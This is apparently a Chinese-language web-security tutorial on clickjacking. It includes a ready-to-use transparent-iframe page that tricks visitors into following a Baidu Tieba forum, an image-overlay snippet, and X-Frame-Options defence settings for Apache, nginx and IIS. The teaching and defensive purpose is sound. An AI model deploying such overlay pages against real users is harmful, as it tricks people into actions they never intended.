点击劫持(ClickJacking)是一种视觉上的欺骗手段。大概有两种方式,

  • 一是攻击者使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作,此时用户将在不知情的情况下点击透明的iframe页面;
  • 二是攻击者使用一张图片覆盖在网页,遮挡网页原有位置的含义;

iframe覆盖

直接示例说明

1. 假如我们在百度有个贴吧,想偷偷让别人关注它。于是我们准备一个页面:



<!DOCTYPE HTML>

<html>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />

<head>

<title>点击劫持</title>

<style>

     html,body,iframe{

         display: block;

          height: 100%;

          width: 100%;

          margin: 0;

          padding: 0;

          border:none;

     }

     iframe{

          opacity:0;

          filter:alpha(opacity=0);

          position:absolute;

          z-index:2;

     }

     button{

          position:absolute;

          top: 315px;

          left: 462px;

          z-index: 1;

          width: 72px;

          height: 26px;

     }

</style>

</head>

     <body>

          那些不能说的秘密

          <button>查看详情</button>

          <iframe src="http://tieba.baidu.com/f?kw=%C3%C0%C5%AE"></iframe>

     </body>

</html>








PS:页面看起来就这样,当然真正攻击的页面会精致些,不像这么简陋。


2. 网址传播出去后,用户手贱点击了查看详情后,其实就会点到关注按钮。


PS:可以把iframe透明设为0.3看下实际点到的东西。




3. 这样贴吧就多了一个粉丝了。


解决办法


使用一个HTTP头——X-Frame-Options。X-Frame-Options可以说是为了解决ClickJacking而生的,它有三个可选的值:


DENY:浏览器会拒绝当前页面加载任何frame页面;


SAMEORIGIN:frame页面的地址只能为同源域名下的页面;


ALLOW-FROM origin:允许frame加载的页面地址;


PS:浏览器支持情况:IE8+、Opera10+、Safari4+、Chrome4.1.249.1042+、Firefox3.6.9。


具体的设置方法:


Apache配置:




Header always append X-Frame-Options SAMEORIGIN




nginx配置:




add_header X-Frame-Options SAMEORIGIN;




IIS配置:




 


<system.webServer>

    ...

    <httpProtocol>

        <customHeaders>

            <add name="X-Frame-Options" value="SAMEORIGIN" />

        </customHeaders>

    </httpProtocol>

    ...

</system.webServer>


 




图片覆盖


图片覆盖攻击(Cross Site Image Overlaying),攻击者使用一张或多张图片,利用图片的style或者能够控制的CSS,将图片覆盖在网页上,形成点击劫持。当然图片本身所带的信息可能就带有欺骗的含义,这样不需要用户点击,也能达到欺骗的目的。


PS:这种攻击很容易出现在网站本身的页面。


示例


在可以输入HTML内容的地方加上一张图片,只不过将图片覆盖在指定的位置。




<a href="http://tieba.baidu.com/f?kw=%C3%C0%C5%AE">

     <img src="XXXXXX" style="position:absolute;top:90px;left:320px;" />

</a>




解决办法


在防御图片覆盖攻击时,需要检查用户提交的HTML代码中,img标签的style属性是否可能导致浮出。


总结


点击劫持算是一种很多人不大关注的攻击,他需要诱使用户与页面进行交互,实施的攻击成本更高。另外开发者可能会觉得是用户犯蠢,不重视这种攻击方式。


出处:https://www.cnblogs.com/lovesong/p/5248483.html
												


											
web安全之点击劫持的更多相关文章
	

    
						
  1. Web安全之点击劫持(ClickJacking)
		
    点击劫持(ClickJacking)是一种视觉上的欺骗手段.大概有两种方式,一是攻击者使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作,此时用户将在不知情的情况下点击透明的 ...
    
		
    2. 
								
  2. 点击劫持ClickJacking
		
    原文:https://beenle-xiaojie.github.io/2019/01/07/ClickJacking/ 引言 当我们的页面嵌入到一个iframe中时,安全测试提出一个于我而言很新鲜的 ...
    
		
    3. 
						
  3. Web应用安全之点击劫持(CLICKJACKING)与X-FRAME-OPTIONS HEADER
		
    点击劫持(clickjacking)与X-Frame-Options Header 文/玄魂 目录 前言... 1.1 点击劫持(clickjacking attacks)... 1.2  Frame ...
    
		
    4. 
						
  4. Web 漏洞分析与防御之点击劫持(三)
		
    原文地址:Web 漏洞分析与防御之点击劫持(三) 博客地址:http://www.extlight.com 一.全称 点击劫持,顾名思义,用户点击某个按钮,却触发了不是用户真正意愿的事件. 二.原理  ...
    
		
    5. 
						
  5. web安全-点击劫持
		
    web安全-点击劫持 opacity=0 iframe是目标网站 被内嵌了 1.用户亲手操作 盗取用户 视频 2.用户不知情 >* 引导点击 其实点击的是覆盖在下面opacity=0的ifram ...
    
		
    6. 
						
  6. web安全:防范点击劫持的两种方式
		
    防范点击劫持的两种方式 什么点击劫持?最常见的是恶意网站使用 <iframe> 标签把我方的一些含有重要信息类如交易的网页嵌入进去,然后把 iframe 设置透明,用定位的手段的把一些引诱 ...
    
		
    7. 
						
  7. 点击劫持(CLICKJACKING)与X-FRAME-OPTIONS HEADER
		
    转载: http://www.tuicool.com/articles/mqUBfa 目录 前言 1.1 点击劫持(clickjacking attacks) 1.2  Frame Bursters. ...
    
		
    8. 
						
  8. 点击劫持漏洞之理解 python打造一个挖掘点击劫持漏洞的脚本
		
    前言: 放假了,上个星期刚刚学习完点击劫持漏洞.没来的及写笔记,今天放学总结了一下 并写了一个检测点击劫持的脚本.点击劫持脚本说一下哈.= =原本是打算把网站源码 中的js也爬出来将一些防御的代码匹配 ...
    
		
    9. 
						
  9. 安全测试4_客户端的安全漏洞(XSS、CSRF、点击劫持、URL跳转)
		
    那个fanh前面学习的都是基础,现在开始正式学习下安全的知识,这一章主要讲解客户端常见的安全漏洞. 看到这个不错,给大家记一下: 1.常见的安全事件: 2.XSS(跨站脚本),英文全称:Cross S ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. 阿里第二轮面试:手写Java二叉树
			
    阿里面试 现在很多公司在招聘开发岗位的时候,都会事先在招聘信息中注明面试者应当具备的知识技能,而且在面试的过程中,有部分对于技能掌握程度有严格要求的公司还会要求面试者手写代码,这个环节很考验面试者的基 ...
    
			
    2. 
						
  2. sqoop导oracle数据到hive中并动态分区
			
    静态分区: 在hive中创建表可以使用hql脚本: test.hql USE TEST; CREATE TABLE page_view(viewTime INT, userid BIGINT, pag ...
    
			
    3. 
						
  3. CODESYS添加target
			
    1.主界面进入Tools 2.Install,选择安装包
    
			
    4. 
						
  4. 新建Servlet工程——IDEA
			
    Servlet是sun公司提供的一套接口规范,是运行在服务端的java程序.实现了Servlet的类能够被服务器识别,而普通的java类不能被识别. 1.新建工程 2. 3.工程名字“: 4.在WEB ...
    
			
    5. 
						
  5. 素数路径Prime Path POJ-3126 素数,BFS
			
    题目链接:Prime Path 题目大意 从一个四位素数m开始,每次只允许变动一位数字使其变成另一个四位素数.求最终把m变成n所需的最少次数. 思路 BFS.搜索的时候,最低位为0,2,4,6,8可以 ...
    
			
    6. 
						
  6. Redis数据库之KEY的操作与事务管理
			
    目的 了解并掌握各种数据类型的命令操作方式,以及各种数据类型值的操作方式.同时,主要培养对KEY的操作命令运用的能力.重点掌握对KEY信息的管理.事务常规管理和事务回滚操作. KEYS命令的练习,对K ...
    
			
    7. 
						
  7. 基于操作系统原理的Linux 系统的安装
			
    一.实验目的 1.了解Linux操作系统的发行版本. 2.掌握Red Hat Linux 9.0的安装方法. (可用Red Hat Linux 5.0版本替代9.0版本) 3.了解Linux其他版本( ...
    
			
    8. 
						
  8. 打印方案之web打印
			
    前言: 前一段时间在工作中,遇到需要通过打印实现对报表或者工作流清单等事情时,都需要运用到打印功能,那么 ,这个时候你会怎么处理? 在这里,我们可以通过最简单的方式实现web打印功能,简单易懂,方便快 ...
    
			
    9. 
						
  9. 读《深入理解Elasticsearch》点滴-查询模版(结合官网手册,版本5.1)
			
    1.为什么使用查询模版 让应用程序开发者只需要把查询传递给elasticsearch,而不需要考虑查询语句的构造.查询DSL语法.查询结果过滤等细节知识. 2.使用版本5.1,查询模版在5.6中发生变 ...
    
			
    10. 
						
  10. CentOS8-网卡配置
			
    一. 介绍 Centos8系统更新,新的版本让人看起来感觉很舒服,这时有人会配置CentOS8系统的网卡使系统上网,就会遇到配置好的网卡不会生效,自己想想和配置CentOS7的时候一个样啊,CentO ...
    
			
    11.